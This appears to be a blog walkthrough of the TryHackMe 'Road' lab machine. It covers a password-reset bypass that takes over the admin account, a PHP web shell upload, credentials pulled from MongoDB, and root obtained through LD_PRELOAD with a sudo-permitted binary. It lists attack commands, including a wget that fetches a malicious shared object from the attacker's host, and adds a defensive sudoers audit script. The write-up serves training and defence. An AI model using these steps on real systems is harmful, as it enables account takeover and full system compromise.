We covered a web application authentication bypass via the password reset feature, followed by Linux privilege escalation using the LD_PRELOAD method. This was part of TryHackMe Road.

By taking advantage of the missing check on the username field, we reset the password and intercept the request with Burp Suite. By changing the username to admin, we were able to reset the admin password and get access to the administration dashboard. We uploaded a web shell and got the first foothold on the machine. Privilege escalation was accomplished by creating a shared object file and making a sudo-permitted binary load it. More on Linux privilege escalation notes

Finding a Way In

My journey starts with a standard Nmap scan, which shows me an SSH port and an HTTP port are open. I check out the web server and find a “Merchant Central” login page. Instead of just hammering away at it, I decide to register a new user to see how the authentication works from the inside.

After logging in, I find a profile image upload feature, but it’s restricted—only the admin can upload files. This is my first big clue. The key to getting admin access turns out to be a flaw in the password reset function. I use Burp Suite to intercept the password reset request for my own user, and then I simply change the username in the request to admin@sky.thm. Just like that, I’m able to reset the admin’s password and log in as the administrator.

With admin privileges, I can now upload files. I upload a simple PHP web shell and find the upload path by looking at the page’s source code. Navigating to my uploaded shell gives me my first foothold on the machine.

From User to Root

Once I have a shell, I stabilize it and start looking around. I find the user flag in the webdeveloper's home directory. Now, it's time to escalate my privileges to root.

I notice that a MongoDB database is running on the machine. Databases are often a treasure trove of credentials, and this one doesn’t disappoint. I log into the database, find a backup database, and dump the contents of the user collection. Inside, I find the plaintext password for the webdeveloper user.

I use the password to switch to the webdeveloper user account. From there, I check what commands I can run with sudo. I find that I can run a sky_backup_utility as any user, including root, and most importantly, the LD_PRELOAD environment variable is preserved.

This is a classic privilege escalation vector. I write a small piece of C code that spawns a shell, compile it into a shared object (.so) file, and upload it to the target machine. Then, I run the backup utility with sudo, but I use the LD_PRELOAD variable to load my malicious shared object first. This trick works perfectly, and I'm rewarded with a root shell. 👑
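The root cause above is a sudoers configuration that keeps LD_PRELOAD across sudo. As an added defensive check (not part of the original writeup or the TryHackMe box), the following Python audit scans sudoers text for env_keep entries that preserve dynamic-loader variables; the sample fragments are constructed, showing the weak setting beside the corrected one.

```python
import re
from typing import List, Tuple

# Constructed sudoers fragment: the second Defaults line is the weak setting that
# lets any caller of the backup utility choose a shared object for the root process.
SUDOERS_WEAK = """
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
Defaults        env_keep += "LANG LC_ALL"
webdeveloper    ALL=(ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""

# Corrected fragment: env_reset stays in force and the loader variable is no longer kept.
SUDOERS_FIXED = """
Defaults        env_reset
Defaults        env_keep += "LANG LC_ALL"
webdeveloper    ALL=(ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""

# Variables that steer the dynamic loader; preserving any of them across sudo
# lets an unprivileged caller pick code that runs inside the privileged process.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Matches 'Defaults ... env_keep = "..."' and 'env_keep += "..."'; 'env_keep -= ...'
# (which removes variables) deliberately does not match. Comments are ignored.
ENV_KEEP_RE = re.compile(r'^\s*Defaults\b[^#]*?\benv_keep\s*(\+=|=)\s*"?([^"#]*)"?')


def kept_loader_vars(sudoers_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, variable) pairs for loader variables the text keeps."""
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(sudoers_text.splitlines(), start=1):
        m = ENV_KEEP_RE.match(line)
        if not m:
            continue
        for var in m.group(2).split():
            if var in LOADER_VARS:
                findings.append((lineno, var))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", SUDOERS_WEAK), ("fixed", SUDOERS_FIXED)):
        print(name, kept_loader_vars(text))  # weak -> [(3, 'LD_PRELOAD')], fixed -> []
```

On a live host the same function can be fed the output of `sudo -l` or the contents of /etc/sudoers and /etc/sudoers.d/*; any finding should be removed from env_keep, since env_reset already drops these variables by default.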

Finally, I navigate to the /root directory and grab the final flag.

Technical Commands

Here are some of the key commands I used to own this box:

  • Initial Recon:
    • nmap
  • Database Enumeration:
    • netstat -tulnp
    • mongo
    • show dbs
    • use backup
    • show collections
    • db.user.find()
  • Privilege Escalation:
    • su webdeveloper
    • sudo -l
    • nano shell.c
    • gcc -shared -o shell.so shell.c
    • wget http://[YOUR_IP]/shell.so
    • sudo LD_PRELOAD=/home/webdeveloper/shell.so /usr/bin/sky_backup_utility
  • Basic Navigation and File Operations:
    • ls, cat, cd, pwd, id
    • python3 -m http.server 80

TryHackMe Road Challenge Answers

What is the user.txt flag?

What is the root.txt flag?

Video WalkThrough


About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
